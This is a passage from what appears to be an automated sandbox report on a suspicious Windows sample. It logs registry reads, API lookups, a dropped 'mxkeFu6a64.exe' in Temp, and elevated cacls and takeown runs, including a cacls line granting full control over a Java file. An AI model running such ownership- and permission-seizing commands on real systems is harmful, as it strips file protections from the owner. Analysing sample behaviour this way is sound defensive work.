1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x11b0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x11f8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "WinMail.exe.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "WinMail.exe.mui" |
|
1 |
Process #132: mxkefu6a.exe
177
0
| Information | Value |
|---|---|
| ID | #132 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:08, Reason: Child Process |
| Unmonitor | End Time: 00:03:16, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xef4 |
| Parent PID | 0x13cc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E40
0x
CBC
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004080C0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040AE73 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040579A |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040B435 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00409AC9 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040608C |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040DEC6 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00410AB1 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00412434 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00416A09, 0x00415F2F, ... |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004048D4 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040C3C0, 0x004112CE |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004020F0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75e90000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x761b0000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x750d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75b70000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74b70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x744a0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\mxkefu6a.exe, file_name_orig = C:\Users\FD1HVy\Desktop\mxkeFu6a.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x75ea1170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75efeac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75ea4be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75efeb30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x75ea4a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75efeed0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75ea5490 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x75ea6520 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77c0a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ea5a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ea53b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x75ea6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x75ea5cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x75ea56c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ea4aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ea6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ea4f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ea5b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ea5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ea50d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ea5ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ea5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x75eff5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75efef60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75ea5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x75eff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75eff500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75eff130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75ea6620 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77bf2dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ea5110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ea57f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75eff450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x75eff4a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75eff4e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ea5ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75efee70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75eff440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ea5320 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ea6720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75ea67e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ea6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ea6830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ea59c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ea5160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ea51f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75efea20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ea5530 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ea4eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ea4c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77bef630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x761cee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x761cf910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x761c8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x761cf530 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x761ce5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x761ce580 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x761cf460 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x761cf9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x761cf100 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x75106b00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x75b747e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x75b74f70 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x75b74ef0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x75b73c10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x75b75c60 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x75b74810 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74b807d0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74b8e6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74b79080 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74b9ab40 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74b83570 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74ba09b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74ba2bec |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74b7d0c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74b793b0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x744a1590 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x744a1510 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x744a1570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75ea6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7500d900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x75ea49a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75ea7760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x75ea7780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x75ea72c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x75ea7440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x75ea5a20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-04-17 10:41:38 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 25125430308 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #133: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #133 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Java\jre1.8.0_144\bin\server\classes.jsa" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:09, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Self Terminated |
| Monitor Duration | 00:00:31 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1388 |
| Parent PID | 0x1204 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1384
0x
CDC
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #134: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #134 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:03:12, Reason: Child Process |
| Unmonitor | End Time: 00:03:48, Reason: Self Terminated |
| Monitor Duration | 00:00:36 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcc0 |
| Parent PID | 0x2b4 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4A4
0x
9C0
0x
6C8
0x
1304
0x
11B8
0x
11AC
0x
384
0x
E18
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| dllhost.exe | 0x7FF6FB010000 | 0x7FF6FB018FFF | Process Termination | - | 64-bit | - |
|
|
|
Process #135: cmd.exe
61
0
| Information | Value |
|---|---|
| ID | #135 |
| File Name | c:\windows\syswow64\cmd.exe |
